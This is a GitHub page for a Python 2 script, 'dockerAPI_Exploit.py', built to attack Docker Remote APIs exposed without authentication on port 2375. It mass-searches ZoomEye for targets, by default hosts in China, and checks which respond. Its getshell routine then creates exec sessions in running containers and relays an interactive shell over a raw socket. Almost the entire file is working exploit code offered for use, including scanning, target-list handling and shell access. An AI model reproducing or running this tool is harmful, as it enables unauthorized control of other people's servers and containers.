-
Notifications
You must be signed in to change notification settings - Fork 22
Expand file tree
/
Copy pathdockerAPI_Exploit.py
More file actions
227 lines (210 loc) · 7.33 KB
/
dockerAPI_Exploit.py
File metadata and controls
227 lines (210 loc) · 7.33 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
# -*- coding:utf-8 -*-
import requests
import urlparse
import argparse
import json
import socket
import time
import sys
class scan():
def __init__(self):
self.VulnerabilityIp = []
def Check(self,url):
Check_Url = url+'containers/json'
try:
TestRe = requests.get(Check_Url,timeout = 5)
except:
print "Can not connect URL Timeout!"
return 1
if 'server' or 'Server' in TestRe.headers.keys():
if 'Docker' in TestRe.headers['server'] or 'Docker' in TestRe.headers['Server'] and 'Command' in TestRe.text:
print "\33[31m%s :vulnerability\33[0m" %url
self.VulnerabilityIp.append(url)
else:
print '%s :not vulnerable' %url
else:
print '%s :not vulnerable' %url
def Getshell(self,url,host,port):
GetShell_Url = url+'containers/json?all=1'
count = 0
try:
TestRe = requests.get(GetShell_Url,timeout = 5)
except:
print "Can not connect URL Timeout!"
exit()
date = TestRe.text
decoded = json.loads(date)
CtrlDocter = []
AccCommand = ['sh', '/bin/sh', '/bin/bash', 'bash', '/bin/csh', 'csh','/bin/ksh', 'ksh', '/bin/tcsh', 'tcsh', '/bin/zsh', 'zsh']
for entries in decoded:
if ("Up" in entries['Status']) and ("Exited" not in entries['Status']) and (entries['Command'] in AccCommand):
count+=1
ID = count
DockerID =entries['Id']
Name = entries['Names']
Image = entries['Image']
Command = entries['Command']
detailed = {'ID':str(ID) , 'Name' :Name[0] ,'Image':Image , 'Command' : Command, 'DockerID' : DockerID}
CtrlDocter.append(detailed)
if count:
print "Control Container Number:%s" %count
for i in CtrlDocter:
print ""
for key , value in i.items():
print "\33[31m"+key+":"+value+"\33[0m"
else:
print "No Container Can Control"
return
print 'Input exit to leave'
while True:
CtrlId = raw_input("Input Container ID:")
if CtrlId == 'exit':
break
Command = CtrlDocter[int(CtrlId) - 1]['Command']
CtrlSId = CtrlDocter[int(CtrlId) - 1]['DockerID'][0:12]
PostUrl = url+'v1.20/containers/'+CtrlSId+'/exec'
HEADER= {
'User-Agent':'Docker-Client/1.8.0 (windows)',
'Content-Length':'156',
'Content-Type':'application/json',
'Accept-Encoding':'gzip'}
payload = '{"Tty": true, "Detach": false, "Container": "%s", "User": "", "AttachStdin": true, "Cmd": ["%s"], "AttachStderr": true, "Privileged": false, "AttachStdout": true}' %(CtrlSId,Command)
re = requests.post(PostUrl, headers=HEADER, data = payload)
decoded = json.loads(re.text)
CreatedId = decoded['Id']
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host, int(port))
sock.connect(server_address)
execDockerPOSTtwo = '''\
POST /v1.20/exec/CreatedId/start HTTP/1.1
Host: 115.123.123.79:2375
User-Agent: Docker-Client/1.8.0 (windows)
Content-Length: 163
Connection: Upgrade
Content-Type: text/plain
Upgrade: tcp
{"User":"","Privileged":false,"Tty":true,"Container":"ContainerId","AttachStdin":true,"AttachStderr":true,"AttachStdout":true,"Detach":false,"Cmd":["Command"]}
'''
execDockerPOSTtwo = execDockerPOSTtwo.replace('ContainerId', CtrlSId).replace('Command', Command)
execDockerPOSTtwo = execDockerPOSTtwo.replace("CreatedId", CreatedId)
time.sleep(1)
sock.sendall(execDockerPOSTtwo)
startinfo = sock.recv(1024*10)
while True:
cmd = raw_input('$:')
sock.sendall(cmd+'\x0d')
time.sleep(2)
if cmd == "exit":
break
print sock.recv(1024*10)
sock.close()
def Panel_Scan(self,Search_keyword,PageNum):
GetTokenUrl = 'https://api.zoomeye.org/user/login'
userinfo ={"username": "username",
"password": "password"}
tokenrl = requests.post(GetTokenUrl,data = json.dumps(userinfo),verify=False)
data = eval(tokenrl.text)
Header = {'Authorization': 'JWT %s' %data['access_token']}
page = 1
TestIpArgs = []
if(Search_keyword == None):
key = 'port:2375 X-Content-Type-Options: nosniff country:"CN"'
else:
key = Search_keyword
while True:
try:
Searchurl = 'https://api.zoomeye.org/host/search?query=%s&page=%s'%(key,str(page))
print 'Search in page :'+str(page)
Searchre = requests.get(Searchurl,headers = Header,verify=False)
GetData = json.loads(Searchre.text)
if PageNum != None:
if page < int(PageNum):
page+=1
else:
break
else:
page+=1
for i in GetData['matches']:
TestIpArgs.append(i['ip'])
except Exception,e:
if str(e.message) == 'matches':
break
print 'Start Test...'
file = open('success.txt','w+')
for TestIp in TestIpArgs:
TestIp = 'http://'+TestIp+':2375/'
print 'test:\t'+TestIp
self.Check(TestIp)
if len(self.VulnerabilityIp):
print str(len(self.VulnerabilityIp))+' Vulnerability Url have found'
else:
print 'No Vulnerability Url found'
for IP in self.VulnerabilityIp:
print IP
file.writelines(IP+'\n')
file.close()
def filescan(self,filepath):
file = open(filepath,'r')
data = file.readlines()
for line in data:
line=line.strip('\n')
self.Check(line)
file.close()
if len(self.VulnerabilityIp):
print str(len(self.VulnerabilityIp))+' Vulnerability Url have found'
else:
print 'No Vulnerability Url found'
for IP in self.VulnerabilityIp:
print IP
def filegetshell(self,filepath):
file = open(filepath,'r')
data = file.readlines()
count = 0
urlargs = []
for line in data:
count+=1
line = line.strip('\n')
TmpUrl = urlparse.urlparse(line)
host= TmpUrl.netloc.split(':')
detail = {'ID':count,'host':host[0],'port':host[1],'url':line}
urlargs.append(detail)
print detail
while True:
num = raw_input('UrlID:')
if num == 'exit':
break
self.Getshell(urlargs[int(num)-1]['url'], urlargs[int(num)-1]['host'],urlargs[int(num)-1]['port'])
if __name__ == '__main__':
parse = argparse.ArgumentParser()
parse.add_argument('-u', dest = 'url' , help = 'example:http://111.222.333.444:2375/')
parse.add_argument('-c', dest = 'check' , action = 'store_true', default = False , help = 'check')
parse.add_argument('-g',dest = 'getshell' , action = 'store_true' , default = False , help = 'getshell')
parse.add_argument('-f',dest = 'zoomeye',action = 'store_true',default = False,help = 'Whether Use Zoomeye')
parse.add_argument('-k',dest = 'keyword',help = 'Search keyword default:port:2375 X-Content-Type-Options: nosniff country:"CN"')
parse.add_argument('-p',dest = 'PageNum',help = 'Search PageNum')
parse.add_argument('-d',dest = 'dictpath',help = 'Detection of URL in the file')
parse.add_argument('-s',dest = 'CtrlDict',help = 'Has confirmed the existence of loopholes, try to get shell')
args = parse.parse_args()
Action_check = args.check
Action_getshell = args.getshell
Action_Panel_Test = args.zoomeye
Search_keyword = args.keyword
PageNum = args.PageNum
filepath = args.dictpath
CtrlDictpath = args.CtrlDict
if(Action_Panel_Test != True and filepath == None and CtrlDictpath == None):
TmpUrl = urlparse.urlparse(args.url)
host= TmpUrl.netloc.split(':')
TestUrl = urlparse.urlunparse((TmpUrl.scheme,TmpUrl.netloc,'/','','',''))
new_scan = scan()
if Action_check == True:
print 'Start Test...'
new_scan.Check(TestUrl)
if(Action_getshell == True):
new_scan.Getshell(TestUrl , host[0] , host[1])
if(Action_Panel_Test == True):
new_scan.Panel_Scan(Search_keyword,PageNum)
if(filepath != None):
new_scan.filescan(filepath)
if(CtrlDictpath != None):
new_scan.filegetshell(CtrlDictpath)